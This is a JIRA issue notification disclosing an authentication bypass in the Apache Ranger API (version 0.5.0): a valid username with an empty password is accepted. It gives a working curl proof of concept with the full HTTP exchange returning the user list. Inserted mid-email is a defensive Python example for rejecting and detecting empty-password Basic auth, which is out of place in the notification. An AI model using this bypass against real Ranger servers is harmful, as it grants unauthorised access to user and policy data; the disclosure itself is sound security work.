Jim Halfpenny created RANGER-835:
------------------------------------

             Summary: Authentication bypass in Ranger API
                 Key: RANGER-835
                 URL: https://issues.apache.org/jira/browse/RANGER-835
             Project: Ranger
          Issue Type: Bug
          Components: Ranger
    Affects Versions: 0.5.0
            Reporter: Jim Halfpenny
            Priority: Critical


Authentication to the Ranger API can be trivially bypassed by sending a valid 
username along with a null password. API authentication appears to work 
correctly, rejecting requests if the password is incorrect, but allows requests 
where no password has been sent.

The example below uses curl to demonstrate this issue by retrieving a list of 
the users.

$ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
* Server auth using Basic with user 'admin'
> HEAD /service/xusers/users HTTP/1.1
> Host: 127.0.0.1:6080
> Authorization: Basic YWRtaW46
> User-Agent: curl/7.43.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
< Content-Type: application/xml
< Content-Length: 0
< Date: Fri, 05 Feb 2016 11:41:16 GMT
< 
<?xml version="1.0" encoding="UTF-8" 
standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...
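As an added illustration (not Ranger's own code), the check a defender wants in front of any credential backend: decode the Basic header exactly as in the transcript above ("YWRtaW46" is "admin:"), refuse an empty password before the backend is ever consulted, and flag such requests in access logs. The log line format and the `backend` callback are assumptions made for this example.

```python
import base64
import binascii

# Constructed log lines: '<client> <method> <path> <authorization-header>'.
# The first carries the credential from the transcript above ("admin:" base64-encoded).
SAMPLE_LOG = [
    "10.0.0.5 GET /service/xusers/users Basic YWRtaW46",
    "10.0.0.7 GET /service/xusers/users Basic YWRtaW46c2VjcmV0",
    "10.0.0.9 GET /service/public/version -",
]

def parse_basic_auth(header):
    """Return (username, password) from a Basic Authorization header,
    or None when the header is absent or malformed."""
    if not header:
        return None
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" not in decoded:  # RFC 7617: user-id ":" password
        return None
    user, _, password = decoded.partition(":")
    return user, password

def authenticate(header, backend):
    """Hardened flow: reject empty credentials before the backend is asked.
    backend(user, password) -> bool is a hypothetical credential check."""
    creds = parse_basic_auth(header)
    if creds is None:
        return False
    user, password = creds
    if not user or not password:
        return False  # fail closed: an empty secret never reaches the backend
    return backend(user, password)

def empty_password_requests(log_lines):
    """Detection: (user, path) for every request whose Basic credential
    decodes to an empty password."""
    hits = []
    for line in log_lines:
        _client, _method, path, header = line.split(" ", 3)
        creds = parse_basic_auth(header)
        if creds is not None and creds[1] == "":
            hits.append((creds[0], path))
    return hits
```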



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)